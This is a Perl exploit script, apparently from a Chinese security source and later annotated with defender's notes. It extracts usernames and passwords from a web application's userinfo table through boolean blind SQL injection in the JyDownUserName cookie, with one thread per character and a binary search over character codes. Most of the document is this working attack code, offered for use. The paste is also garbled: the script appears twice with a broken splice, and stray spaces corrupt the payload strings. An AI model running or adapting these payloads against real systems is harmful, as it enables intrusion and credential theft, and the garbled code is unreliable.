信息来源:hoky
代码:
#!/usr/bin/perl
use IO::Sock
#!/usr/bin/perl
use IO::Socket;
use threads;
# Driver for a boolean-based blind SQL injection probe.  Every request
# carries an injected predicate inside a cookie value (see GetRequest and
# its callers below) and the text of the server's reply is read as a
# true/false oracle.  Defender's view: the distinctive signals are the
# tab-encoded `%09union%09select` sequence and a quoted id inside the
# JyDownUserName cookie, and long bursts of otherwise identical POSTs to
# one path in which only that cookie changes.  A parameterized userinfo
# lookup removes the oracle entirely.
# Arguments are positional and used without validation:
#   ARGV[0] host, ARGV[1] port, ARGV[2] request path, ARGV[3] userinfo id,
#   ARGV[4] mode (0 = lengths, 1 = user, 2 = pwd), ARGV[5] character count.
# All of these are package globals (no `use strict`), read by the subs below.
$lhost = $ARGV[0];# target host IP
$port = $ARGV[1];# port number (the original comment says "default 80", but no default is applied here)
$path = $ARGV[2];
$id = $ARGV[3];
$mod = $ARGV[4];
$char = $ARGV[5];
$argv_len=@ARGV;
# NOTE(review): usage() lists six arguments but five are accepted here, so
# $char may be undef in modes 1 and 2; the thread loops then run zero times.
if($argv_len<=4) { usage(); exit(); }
# Mode 0: length discovery, sequential, one request per candidate length.
if($mod==0)
{
get_user_len($id);
get_pwd_len($id);
}
# Mode 1: one thread per character position 1..$char, each recovering one
# character of the `user` column via get_user/bin_s.  @t is a package
# global holding the thread handles.  With perl ithreads each thread gets
# its own copy of non-:shared data, so the un-`my`ed variables used inside
# the workers are not shared between them.
elsif($mod==1)
{
#get_user($id,$char);
my $i;
for($i=1;$i<=$char;$i++)
{
$t[$i]=threads->new(\&get_user,$id,$i);
}
for($i=1;$i<=$char;$i++)
{
$t[$i]->join();
}
}
# Mode 2: same fan-out as mode 1 but against the `pwd` column.
elsif($mod==2)
{
#get_pwd($id,$char);
my $i;
for($i=1;$i<=$char;$i++)
{
$t[$i]=threads->new(\&get_pwd,$id,$i);
}
for($i=1;$i<=$char;$i++)
{
$t[$i]->join();
}
}
# Any other mode value falls through and exits silently.
exit();
# Thread worker for mode 1: resolves the character at 1-based position
# $char_now of the `user` column for row $id and prints it.  $path is the
# package global set from @ARGV.  Output of concurrent workers interleaves
# in arrival order, not position order.  The `()` prototype is inert: the
# sub is compiled after its call sites and the thread entry is a code ref.
sub get_user()
{
my($id,$char_now)=@_;
# Search the ASCII code in 0..123 (see bin_s for the request pattern).
my $aaa=bin_s(0,123,$path,$char_now,$id);
print "The $char_now char:".chr($aaa)."\n";
}
# Recovers one character of the `user` column for row $id by binary
# searching its ASCII code within [$low, $high].  Each step costs up to two
# oracle requests through GetRequest: "asc(mid(user,$char_now,1)) > $mid",
# and, only if that is false, "... = $mid".  Returns the code once the
# equality test succeeds.  $path is passed through to GetRequest;
# $char_now is the 1-based character position.
# Defender's note: the two predicates differ from a legitimate cookie only
# by the injected text, so the server-side fix is a parameterized query;
# the client-side signal is the volume of requests per distinct cookie.
sub bin_s()
{
my ($low,$high,$path,$char_now,$id)=@_;
# $mid is the midpoint rounded up (ceil), computed without POSIX.
my $lh=($low+$high)/2;
my $aaaa=$lh-int($lh);
my $mid;
if($aaaa>0)
{
$mid=int($lh)+1;
}
else
{
$mid=int($lh);
}
# First oracle: is the character code greater than $mid?  The stray spaces
# inside the literal (e.g. "%0 9", "use r") look like line-wrap artifacts
# of the paste rather than part of the intended request.
my $mid_flag=GetRequest($path,"xxxxxxxx'%09union%09select%09*%0 9from%09userinfo%09where%09id%3D".$id."%09and%09asc(mid(user ,$char_now,1))>".$mid."%09and%09'1%3D1");
my $mid1_flag;
# Second oracle only when the first said "not greater": is it equal to $mid?
if($mid_flag==0)
{
$mid1_flag=GetRequest($path,"xxxxxxxx'%09union%09select%09*% 09from%09userinfo%09where%09id%3D".$id."%09and%09asc(mid(use r,$char_now,1))%3D".$mid."%09and%09'1%3D1");
}
else
{
# Forced to 0 here, so the (1,1) combination below can never occur.
$mid1_flag=0;
}
#print "\n low:$low mid:$mid high:$high $mid_flag $mid1_flag char_now:$char_now id:$id";
if($mid_flag==0&&$mid1_flag==1)
{
return $mid;
}
# The recursive branches have no explicit `return`; Perl returns the value
# of the last expression evaluated, i.e. the nested call's result.
elsif($mid_flag==1&&$mid1_flag==0)
{
bin_s($mid,$high,$path,$char_now,$id);
}
elsif($mid_flag==0&&$mid1_flag==0)
{
bin_s($low,$mid,$path,$char_now,$id);
}
# NOTE(review): there is no guard for a range that stops shrinking (for
# example $low == $high, or (0,1), with neither test true), so an
# inconsistent oracle or a code outside 0..123 recurses without bound.
}
# Thread worker for mode 2: resolves the character at 1-based position
# $char_now of the `pwd` column for row $id and prints it.  $path is the
# package global set from @ARGV.  Mirrors get_user; only the searched
# column differs.  The `()` prototype is inert for the same reasons.
sub get_pwd()
{
my($id,$char_now)=@_;
# Search the ASCII code in 0..123 (see bin_pwd_s for the request pattern).
my $aaa=bin_pwd_s(0,123,$path,$char_now,$id);
print "The $char_now char:".chr($aaa)."\n";
}
# Same binary search as bin_s, but the injected predicate reads the `pwd`
# column instead of `user`.  Returns the ASCII code of character
# $char_now of pwd for row $id; up to two GetRequest calls per step.
# Defender's note: this is the branch that turns a boolean oracle into
# credential disclosure; any page that echoes a different string depending
# on whether an attacker-controlled predicate held is enough for it.
sub bin_pwd_s()
{
my ($low,$high,$path,$char_now,$id)=@_;
# $mid is the midpoint rounded up (ceil), computed without POSIX.
my $lh=($low+$high)/2;
my $aaaa=$lh-int($lh);
my $mid;
if($aaaa>0)
{
$mid=int($lh)+1;
}
else
{
$mid=int($lh);
}
# First oracle: is the character code greater than $mid?  The stray spaces
# inside the literal look like line-wrap artifacts of the paste.
my $mid_flag=GetRequest($path,"xxxxxxxx'%09union%09select%09*%0 9from%09userinfo%09where%09id%3D".$id."%09and%09asc(mid(pwd, $char_now,1))>".$mid."%09and%09'1%3D1");
my $mid1_flag;
# Second oracle only when the first said "not greater": is it equal to $mid?
if($mid_flag==0)
{
$mid1_flag=GetRequest($path,"xxxxxxxx'%09union%09select%09*% 09from%09userinfo%09where%09id%3D".$id."%09and%09asc(mid(pwd ,$char_now,1))%3D".$mid."%09and%09'1%3D1");
}
else
{
# Forced to 0 here, so the (1,1) combination below can never occur.
$mid1_flag=0;
}
#print "\n low:$low mid:$mid high:$high $mid_flag $mid1_flag char_now:$char_now id:$id";
if($mid_flag==0&&$mid1_flag==1)
{
return $mid;
}
# Recursive branches rely on Perl's implicit return of the last expression.
elsif($mid_flag==1&&$mid1_flag==0)
{
bin_pwd_s($mid,$high,$path,$char_now,$id);
}
elsif($mid_flag==0&&$mid1_flag==0)
{
bin_pwd_s($low,$mid,$path,$char_now,$id);
}
# NOTE(review): as in bin_s, a range that stops shrinking recurses without bound.
}
# Mode 0 helper: probes "len(user) = N" for N = 1..30, one GetRequest per
# candidate, and prints the first N for which the oracle answers true.
# Returns that N, or 31 when none of 1..30 matched (the loop exits with
# $user_j == 31).  $user_j and $user_flag are package globals (no `my`).
sub get_user_len()
{
my($id)=@_;
for($user_j=1;$user_j<=30;$user_j++)
{
$user_flag=GetRequest($path,"xxxxxxxx'%09union%09select%09*% 09from%09userinfo%09where%09id%3D".$id."%09and%09len(user)%3 D".$user_j."%09and%09'1%3D1");
# `last` keeps $user_j at the matching length.
if($user_flag==1){last;}
}
if($user_j<31)
{
print "User_length of id $id: $user_j\n";
}
else
{
print "Can't get user length\n";
}
return $user_j;
}
# Mode 0 helper: same 1..30 length probe as get_user_len, against the
# `pwd` column.  Returns the matched length, or 31 when none matched.
sub get_pwd_len()
{
my($id)=@_;
# `my` binds tighter than the comma, so only $user_j is lexical here;
# $user_flag stays a package global (`use strict` would reject this line).
my $user_j,$user_flag;
for($user_j=1;$user_j<=30;$user_j++)
{
$user_flag=GetRequest($path,"xxxxxxxx'%09union%09select%09*% 09from%09userinfo%09where%09id%3D".$id."%09and%09len(pwd)%3D ".$user_j."%09and%09'1%3D1");
# `last` keeps $user_j at the matching length.
if($user_flag==1){last;}
}
if($user_j<31)
{
print "Pass_length of id $id: $user_j\n";
}
else
{
print "Can't get password length\n";
}
return $user_j;
}
# Sends one hand-built HTTP/1.1 POST to $lhost:$port (package globals from
# @ARGV) and reports whether the reply contains the literal "原密码错误"
# ("original password is wrong").  $lpath is the request path; $usercookie
# is placed, unencoded, in the JyDownUserName cookie, which is where every
# caller puts its injected predicate.  Returns 1 if the marker string was
# seen in the first 40 response lines, else 0.
# Defender's notes: the marker string is the oracle, so an application that
# returns the same page regardless of whether the injected predicate held
# leaks nothing through this path; and the cookie is the only part of the
# request that varies between calls, which makes it the natural field to
# log, normalize (reject control characters such as %09) and rate-limit.
sub GetRequest()
{
my($lpath,$usercookie)=@_;
# $remote, $content, $length, $post, $i and $line below are all package
# globals (no `my`).  Dies if the TCP connect fails.
$remote=IO::Socket::INET->new (Proto => "tcp", PeerAddr=>$lhost, PeerPort => $port, Type => SOCK_STREAM) or die "Couldnt connect to $lhost:$port : $@\n";
$remote->autoflush(1);
# Fixed form body; its values do not change between probes.
$content=" type=save&pwd=tttttt3333tttt&pwd1=&pwd2=&oic q=33337788&email=fsadf@fsf.com&homepage=&qm=& ;softurl=&b1=%C8%B7%C8%CF%D0%DE%B8%C4 ";
$length=length($content);
# Headers imitate an old MSIE client; Content-Length is derived from
# $content so the framing is correct.
$post="POST ".$lpath." HTTP/1.1\r\n".
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*\r\n".
"Referer: http://".$lhost.":".$port."/".$path."\r\n".
"Accept-Language: zh-cn\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE2)\r\n".
"Host: $lhost\r\n".
"Content-Length: ".$length."\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n".
"Cookie:iscookies=0; JyDownUserDj=0; JyDownUserName=".$usercookie."\r\n\r\n".
$content;
print $remote $post;
my $flag=0;
# Reads at most 40 lines and scans each for the marker.  Because the
# request asks for Keep-Alive, a server that sends fewer than 40 lines and
# holds the connection open presumably leaves <$remote> blocking; one that
# closes early makes $line undef and index() warns.  Accept-Encoding
# advertises gzip/deflate but the body is compared as raw bytes, so a
# compressed reply never matches.  Without `use utf8` the marker is
# compared in the script's source encoding, which must match the
# server's response encoding byte for byte.
for($i=1;$i<=40;$i++)
{
$line=<$remote>;
if(index($line,"原密码错误")!=-1)
{
$flag=1;
}
}
# Unchecked close of a socket we only read from at this point.
close $remote;
return $flag;
}
# Prints the argument summary.  The Chinese text reads: mode 0 = user name
# and password length, 1 = guess user, 2 = guess password; char = the
# character position to guess, 1-20.  The last line has no trailing newline.
sub usage()
{
print "$0 host port path id mod char\n";
print "mod 0 用户名和密码长度 1 猜用户 2 猜密码\n";
print "char 猜测字符位置 1-20";
}et; # "et;" is a paste artifact: the tail of "use IO::Socket;" from the duplicated copy that follows
use threads;
# Driver for a boolean-based blind SQL injection probe.  Every request
# carries an injected predicate inside a cookie value (see GetRequest and
# its callers below) and the text of the server's reply is read as a
# true/false oracle.  Defender's view: the distinctive signals are the
# tab-encoded `%09union%09select` sequence and a quoted id inside the
# JyDownUserName cookie, and long bursts of otherwise identical POSTs to
# one path in which only that cookie changes.  A parameterized userinfo
# lookup removes the oracle entirely.
# Arguments are positional and used without validation:
#   ARGV[0] host, ARGV[1] port, ARGV[2] request path, ARGV[3] userinfo id,
#   ARGV[4] mode (0 = lengths, 1 = user, 2 = pwd), ARGV[5] character count.
# All of these are package globals (no `use strict`), read by the subs below.
$lhost = $ARGV[0];# target host IP
$port = $ARGV[1];# port number (the original comment says "default 80", but no default is applied here)
$path = $ARGV[2];
$id = $ARGV[3];
$mod = $ARGV[4];
$char = $ARGV[5];
$argv_len=@ARGV;
# NOTE(review): usage() lists six arguments but five are accepted here, so
# $char may be undef in modes 1 and 2; the thread loops then run zero times.
if($argv_len<=4) { usage(); exit(); }
# Mode 0: length discovery, sequential, one request per candidate length.
if($mod==0)
{
get_user_len($id);
get_pwd_len($id);
}
# Mode 1: one thread per character position 1..$char, each recovering one
# character of the `user` column via get_user/bin_s.  @t is a package
# global holding the thread handles.  With perl ithreads each thread gets
# its own copy of non-:shared data, so the un-`my`ed variables used inside
# the workers are not shared between them.
elsif($mod==1)
{
#get_user($id,$char);
my $i;
for($i=1;$i<=$char;$i++)
{
$t[$i]=threads->new(\&get_user,$id,$i);
}
for($i=1;$i<=$char;$i++)
{
$t[$i]->join();
}
}
# Mode 2: same fan-out as mode 1 but against the `pwd` column.
elsif($mod==2)
{
#get_pwd($id,$char);
my $i;
for($i=1;$i<=$char;$i++)
{
$t[$i]=threads->new(\&get_pwd,$id,$i);
}
for($i=1;$i<=$char;$i++)
{
$t[$i]->join();
}
}
# Any other mode value falls through and exits silently.
exit();
# Thread worker for mode 1: resolves the character at 1-based position
# $char_now of the `user` column for row $id and prints it.  $path is the
# package global set from @ARGV.  Output of concurrent workers interleaves
# in arrival order, not position order.  The `()` prototype is inert: the
# sub is compiled after its call sites and the thread entry is a code ref.
sub get_user()
{
my($id,$char_now)=@_;
# Search the ASCII code in 0..123 (see bin_s for the request pattern).
my $aaa=bin_s(0,123,$path,$char_now,$id);
print "The $char_now char:".chr($aaa)."\n";
}
# Recovers one character of the `user` column for row $id by binary
# searching its ASCII code within [$low, $high].  Each step costs up to two
# oracle requests through GetRequest: "asc(mid(user,$char_now,1)) > $mid",
# and, only if that is false, "... = $mid".  Returns the code once the
# equality test succeeds.  $path is passed through to GetRequest;
# $char_now is the 1-based character position.
# Defender's note: the two predicates differ from a legitimate cookie only
# by the injected text, so the server-side fix is a parameterized query;
# the client-side signal is the volume of requests per distinct cookie.
sub bin_s()
{
my ($low,$high,$path,$char_now,$id)=@_;
# $mid is the midpoint rounded up (ceil), computed without POSIX.
my $lh=($low+$high)/2;
my $aaaa=$lh-int($lh);
my $mid;
if($aaaa>0)
{
$mid=int($lh)+1;
}
else
{
$mid=int($lh);
}
# First oracle: is the character code greater than $mid?  The stray spaces
# inside the literal (e.g. "%0 9", "use r") look like line-wrap artifacts
# of the paste rather than part of the intended request.
my $mid_flag=GetRequest($path,"xxxxxxxx'%09union%09select%09*%0 9from%09userinfo%09where%09id%3D".$id."%09and%09asc(mid(user ,$char_now,1))>".$mid."%09and%09'1%3D1");
my $mid1_flag;
# Second oracle only when the first said "not greater": is it equal to $mid?
if($mid_flag==0)
{
$mid1_flag=GetRequest($path,"xxxxxxxx'%09union%09select%09*% 09from%09userinfo%09where%09id%3D".$id."%09and%09asc(mid(use r,$char_now,1))%3D".$mid."%09and%09'1%3D1");
}
else
{
# Forced to 0 here, so the (1,1) combination below can never occur.
$mid1_flag=0;
}
#print "\n low:$low mid:$mid high:$high $mid_flag $mid1_flag char_now:$char_now id:$id";
if($mid_flag==0&&$mid1_flag==1)
{
return $mid;
}
# The recursive branches have no explicit `return`; Perl returns the value
# of the last expression evaluated, i.e. the nested call's result.
elsif($mid_flag==1&&$mid1_flag==0)
{
bin_s($mid,$high,$path,$char_now,$id);
}
elsif($mid_flag==0&&$mid1_flag==0)
{
bin_s($low,$mid,$path,$char_now,$id);
}
# NOTE(review): there is no guard for a range that stops shrinking (for
# example $low == $high, or (0,1), with neither test true), so an
# inconsistent oracle or a code outside 0..123 recurses without bound.
}
# Thread worker for mode 2: resolves the character at 1-based position
# $char_now of the `pwd` column for row $id and prints it.  $path is the
# package global set from @ARGV.  Mirrors get_user; only the searched
# column differs.  The `()` prototype is inert for the same reasons.
sub get_pwd()
{
my($id,$char_now)=@_;
# Search the ASCII code in 0..123 (see bin_pwd_s for the request pattern).
my $aaa=bin_pwd_s(0,123,$path,$char_now,$id);
print "The $char_now char:".chr($aaa)."\n";
}
# Same binary search as bin_s, but the injected predicate reads the `pwd`
# column instead of `user`.  Returns the ASCII code of character
# $char_now of pwd for row $id; up to two GetRequest calls per step.
# Defender's note: this is the branch that turns a boolean oracle into
# credential disclosure; any page that echoes a different string depending
# on whether an attacker-controlled predicate held is enough for it.
sub bin_pwd_s()
{
my ($low,$high,$path,$char_now,$id)=@_;
# $mid is the midpoint rounded up (ceil), computed without POSIX.
my $lh=($low+$high)/2;
my $aaaa=$lh-int($lh);
my $mid;
if($aaaa>0)
{
$mid=int($lh)+1;
}
else
{
$mid=int($lh);
}
# First oracle: is the character code greater than $mid?  The stray spaces
# inside the literal look like line-wrap artifacts of the paste.
my $mid_flag=GetRequest($path,"xxxxxxxx'%09union%09select%09*%0 9from%09userinfo%09where%09id%3D".$id."%09and%09asc(mid(pwd, $char_now,1))>".$mid."%09and%09'1%3D1");
my $mid1_flag;
# Second oracle only when the first said "not greater": is it equal to $mid?
if($mid_flag==0)
{
$mid1_flag=GetRequest($path,"xxxxxxxx'%09union%09select%09*% 09from%09userinfo%09where%09id%3D".$id."%09and%09asc(mid(pwd ,$char_now,1))%3D".$mid."%09and%09'1%3D1");
}
else
{
# Forced to 0 here, so the (1,1) combination below can never occur.
$mid1_flag=0;
}
#print "\n low:$low mid:$mid high:$high $mid_flag $mid1_flag char_now:$char_now id:$id";
if($mid_flag==0&&$mid1_flag==1)
{
return $mid;
}
# Recursive branches rely on Perl's implicit return of the last expression.
elsif($mid_flag==1&&$mid1_flag==0)
{
bin_pwd_s($mid,$high,$path,$char_now,$id);
}
elsif($mid_flag==0&&$mid1_flag==0)
{
bin_pwd_s($low,$mid,$path,$char_now,$id);
}
# NOTE(review): as in bin_s, a range that stops shrinking recurses without bound.
}
# Mode 0 helper: probes "len(user) = N" for N = 1..30, one GetRequest per
# candidate, and prints the first N for which the oracle answers true.
# Returns that N, or 31 when none of 1..30 matched (the loop exits with
# $user_j == 31).  $user_j and $user_flag are package globals (no `my`).
sub get_user_len()
{
my($id)=@_;
for($user_j=1;$user_j<=30;$user_j++)
{
$user_flag=GetRequest($path,"xxxxxxxx'%09union%09select%09*% 09from%09userinfo%09where%09id%3D".$id."%09and%09len(user)%3 D".$user_j."%09and%09'1%3D1");
# `last` keeps $user_j at the matching length.
if($user_flag==1){last;}
}
if($user_j<31)
{
print "User_length of id $id: $user_j\n";
}
else
{
print "Can't get user length\n";
}
return $user_j;
}
# Mode 0 helper: same 1..30 length probe as get_user_len, against the
# `pwd` column.  Returns the matched length, or 31 when none matched.
sub get_pwd_len()
{
my($id)=@_;
# `my` binds tighter than the comma, so only $user_j is lexical here;
# $user_flag stays a package global (`use strict` would reject this line).
my $user_j,$user_flag;
for($user_j=1;$user_j<=30;$user_j++)
{
$user_flag=GetRequest($path,"xxxxxxxx'%09union%09select%09*% 09from%09userinfo%09where%09id%3D".$id."%09and%09len(pwd)%3D ".$user_j."%09and%09'1%3D1");
# `last` keeps $user_j at the matching length.
if($user_flag==1){last;}
}
if($user_j<31)
{
print "Pass_length of id $id: $user_j\n";
}
else
{
print "Can't get password length\n";
}
return $user_j;
}
# Sends one hand-built HTTP/1.1 POST to $lhost:$port (package globals from
# @ARGV) and reports whether the reply contains the literal "原密码错误"
# ("original password is wrong").  $lpath is the request path; $usercookie
# is placed, unencoded, in the JyDownUserName cookie, which is where every
# caller puts its injected predicate.  Returns 1 if the marker string was
# seen in the first 40 response lines, else 0.
# Defender's notes: the marker string is the oracle, so an application that
# returns the same page regardless of whether the injected predicate held
# leaks nothing through this path; and the cookie is the only part of the
# request that varies between calls, which makes it the natural field to
# log, normalize (reject control characters such as %09) and rate-limit.
sub GetRequest()
{
my($lpath,$usercookie)=@_;
# $remote, $content, $length, $post, $i and $line below are all package
# globals (no `my`).  Dies if the TCP connect fails.
$remote=IO::Socket::INET->new (Proto => "tcp", PeerAddr=>$lhost, PeerPort => $port, Type => SOCK_STREAM) or die "Couldnt connect to $lhost:$port : $@\n";
$remote->autoflush(1);
# Fixed form body; its values do not change between probes.
$content=" type=save&pwd=tttttt3333tttt&pwd1=&pwd2=&oic q=33337788&email=fsadf@fsf.com&homepage=&qm=& ;softurl=&b1=%C8%B7%C8%CF%D0%DE%B8%C4 ";
$length=length($content);
# Headers imitate an old MSIE client; Content-Length is derived from
# $content so the framing is correct.
$post="POST ".$lpath." HTTP/1.1\r\n".
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*\r\n".
"Referer: http://".$lhost.":".$port."/".$path."\r\n".
"Accept-Language: zh-cn\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE2)\r\n".
"Host: $lhost\r\n".
"Content-Length: ".$length."\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n".
"Cookie:iscookies=0; JyDownUserDj=0; JyDownUserName=".$usercookie."\r\n\r\n".
$content;
print $remote $post;
my $flag=0;
# Reads at most 40 lines and scans each for the marker.  Because the
# request asks for Keep-Alive, a server that sends fewer than 40 lines and
# holds the connection open presumably leaves <$remote> blocking; one that
# closes early makes $line undef and index() warns.  Accept-Encoding
# advertises gzip/deflate but the body is compared as raw bytes, so a
# compressed reply never matches.  Without `use utf8` the marker is
# compared in the script's source encoding, which must match the
# server's response encoding byte for byte.
for($i=1;$i<=40;$i++)
{
$line=<$remote>;
if(index($line,"原密码错误")!=-1)
{
$flag=1;
}
}
# Unchecked close of a socket we only read from at this point.
close $remote;
return $flag;
}
# Prints the argument summary.  The Chinese text reads: mode 0 = user name
# and password length, 1 = guess user, 2 = guess password; char = the
# character position to guess, 1-20.  The last line has no trailing newline.
sub usage()
{
print "$0 host port path id mod char\n";
print "mod 0 用户名和密码长度 1 猜用户 2 猜密码\n";
print "char 猜测字符位置 1-20";
}